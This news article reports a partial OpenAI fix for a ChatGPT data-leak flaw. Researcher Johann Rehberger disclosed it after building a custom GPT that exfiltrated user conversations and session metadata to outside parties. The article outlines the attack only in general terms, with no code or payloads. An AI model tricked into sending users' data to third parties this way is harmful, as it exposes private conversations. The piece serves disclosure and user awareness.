OpenAI releases ChatGPT data leak patch, but the issue isn’t completely fixed

    We’ve said it before, and we’ll say it again: Don’t input anything into ChatGPT that you don’t want unauthorized parties to read.

    Since OpenAI released ChatGPT last year, there have been quite a few occasions where flaws in the AI chatbot could’ve been weaponized or manipulated by bad actors to access sensitive or private data. And this latest example shows that even after a security patch has been released, problems can still persist.

    According to a report by Bleeping Computer, OpenAI has recently rolled out a fix for an issue where ChatGPT could leak users’ data to unauthorized third parties. This data could include user conversations with ChatGPT and corresponding metadata like a user’s ID and session information. 

    However, according to security researcher Johann Rehberger, who originally discovered the vulnerability and outlined how it worked, there are still gaping security holes in OpenAI’s fix. In essence, the security flaw still exists.

    The ChatGPT data leak

    Rehberger was able to take advantage of OpenAI’s recently released and much-lauded custom GPTs feature to create his own GPT, which exfiltrated data from ChatGPT. This was a significant finding as custom GPTs are being marketed as AI apps akin to how the iPhone revolutionized mobile applications with the App Store. If Rehberger could create this custom GPT, it seems like bad actors could soon discover the flaw and create custom GPTs to steal data from their targets.

    Rehberger says he first contacted OpenAI about the “data exfiltration technique” way back in April. He contacted OpenAI once again in November to report exactly how he was able to create a custom GPT and carry out the process.

    On Wednesday, Rehberger posted an update to his website. OpenAI had patched the leak vulnerability.

    “The fix is not perfect, but a step into the right direction,” Rehberger explained.

    The reason the fix isn’t perfect is that ChatGPT is still leaking data through the vulnerability Rehberger discovered. ChatGPT can still be tricked into sending data.

    “Some quick tests show that bits of info can steal [sic] leak,” Rehberger wrote, further explaining that “it only leaks small amounts this way, is slow and more noticeable to a user.” Regardless of the remaining issues, Rehberger said it’s a “step in the right direction for sure.”

    But, the security flaw still remains entirely in the ChatGPT apps for iOS and Android, which have yet to be updated with a fix.

    ChatGPT users should remain vigilant when using custom GPTs and should likely pass on these AI apps from unknown third parties.

    Read the full article here

    Recent Articles

    Related Stories

    Leave A Reply

    Please enter your comment!
    Please enter your name here

    Stay on op - Ge the daily news in your inbox